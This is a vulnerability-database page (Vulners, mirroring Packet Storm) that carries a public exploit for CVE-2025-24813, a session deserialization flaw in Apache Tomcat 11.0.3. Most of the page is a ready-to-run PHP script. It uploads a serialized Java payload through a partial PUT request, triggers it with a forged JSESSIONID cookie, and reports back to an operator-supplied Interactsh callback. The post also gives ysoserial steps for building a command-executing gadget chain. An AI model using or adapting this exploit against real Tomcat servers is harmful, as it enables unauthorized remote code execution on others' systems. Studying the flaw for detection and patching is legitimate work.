Lucene search
+L

๐Ÿ“„ Apache Tomcat 11.0.3 Remote Session Injection

๐Ÿ—“๏ธย 26 Nov 2025ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 286ย Views

Tomcat 11.0.3 remote session injection via forged JSESSIONID and uploaded serialized payload (CVE-2025-24813).

Related
Code
=============================================================================================================================================
    | # Title     : Apache Tomcat 11.0.3 Remote Session Injection                                                                               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://tomcat.apache.org/                                                                                                  |
    =============================================================================================================================================
    
    [+] Summary : 
    
    A vulnerability allows attackers to upload a .session file containing a malicious Java serialized payload and then trigger it through a forged JSESSIONID cookie.
    
    [+] References : ( CVE-2025-24813 ) 
    
    1. Save the file as: poc.php
    
    2. Edit the target:
    ```php
    $target = "http://TARGET";
    
    3.Execute: php poc.php
    
    [+]  POC
    
    <?php
    /*
        CVE-2025-24813 โ€“ PHP Exploit 
        Author: Indoushka
        Packet Storm Security 
    */
    
    function rand_filename($length = 6) {
        $chars = 'abcdefghijklmnopqrstuvwxyz';
        $name = '';
        for ($i = 0; $i < $length; $i++) {
            $name .= $chars[random_int(0, strlen($chars)-1)];
        }
        return $name;
    }
    
    function generate_payload($interact_url) {
        // Java Serialized payload (replace with your custom gadget)
        return "\xac\xed\x00\x05\x73\x72\x00\x04\x44\x75\x6d\x6d\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x78\x70";
    
    }
    
    function exploit($target, $interact_url) {
    
        $filename = rand_filename();
        $put_url = $target . "/" . $filename . ".session";
        $get_url = $target . "/" . $filename;
    
        echo "[+] Exploit for CVE-2025-24813\n";
        echo "[+] By Indoushka\n\n";
        echo "[+] Uploading payload to: $put_url\n";
    
        $payload = generate_payload($interact_url);
    
        $headers = [
            "Content-Range: bytes 0-452/457",
            "Content-Type: application/octet-stream"
        ];
    
        $opts = [
            'http' => [
                'method' => "PUT",
                'header' => implode("\r\n", $headers),
                'content' => $payload,
                'ignore_errors' => true
            ]
        ];
    
        $context = stream_context_create($opts);
        $result = @file_get_contents($put_url, false, $context);
    
        preg_match('/HTTP\/\d\.\d\s+(\d+)/', $http_response_header[0], $m);
        $status = $m[1];
    
        if ($status == 201) {
            echo "[+] Payload uploaded successfully.\n";
        } else {
            echo "[-] Upload failed with status: $status\n";
            return;
        }
    
        echo "[+] Triggering payload via: $get_url\n";
    
        $opts2 = [
            'http' => [
                'method' => "GET",
                'header' => "Cookie: JSESSIONID=.$filename\r\n",
                'ignore_errors' => true
            ]
        ];
    
        $context2 = stream_context_create($opts2);
        @file_get_contents($get_url, false, $context2);
    
        echo "[+] Trigger request sent. Check your Interactsh callback: $interact_url\n";
    }
    
    // ====== Interactive Shell ======
    echo "[+] Exploit for CVE-2025-24813\n";
    echo "[+] Made By Indoushka\n\n";
    
    echo "Target URL: ";
    $target = trim(fgets(STDIN));
    
    echo "Interact URL: ";
    $interact = trim(fgets(STDIN));
    
    exploit($target, $interact);
    ?>
    
    
    
    ------------
    
    Generating a gadgets chain:
    
    Generate a Commons-Collections-4 payload to execute the command: whoami
    
    java -jar ysoserial.jar CommonsCollections4 "whoami" > payload.bin
    
    Convert it to hex or base64 for input into PHP : xxd -p payload.bin
    
    Place it where: return "<hex serialized bytes>";
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Nov 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.19.8 - 10
EPSS0.99945
286